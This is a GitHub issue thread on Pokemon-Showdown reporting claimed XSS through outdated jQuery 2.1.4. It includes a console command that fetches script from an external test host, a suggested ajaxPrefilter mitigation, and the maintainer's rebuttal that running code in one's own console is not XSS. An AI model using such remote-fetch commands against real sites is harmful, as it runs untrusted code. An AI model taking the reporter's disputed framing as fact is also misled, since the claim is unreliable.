### ISSUE TITLE
XSS due to outdated jQuery

### ISSUE THREAD

**Issue by boomcan90** [Zarel/Pokemon-Showdown#5117]
jQuery 2.1.4 being used by the server is vulnerable to dom-based Cross-site scripting. 

Proof: 
![image](https://user-images.githubusercontent.com/10251359/51586767-7b9c6000-1f19-11e9-974b-37274405876a.png)

**Steps to trigger**

- Open Web console
- Type `$.get("https://testingxss.free.beeceptor.com")` and press enter
- Alert window showing popup will be visible

**Mitigation**

- Update to the latest stable version of jquery
- Add in preprocessors that prevent javascript loaded from AJAX requests from being evaluated.

**Comment by boomcan90** [comment]
Another possible mitigation is to add in the following code into the webpage AFTER jquery has loaded to ensure that jquery cannot be executed: 

```jQuery.ajaxPrefilter( function( s ) {
    if ( s.crossDomain ) {
        s.contents.script = false;
    }
} );```

**Comment by Zarel** [comment]
It's not XSS if you first execute arbitrary JavaScript. That's not what "XSS" means. :|
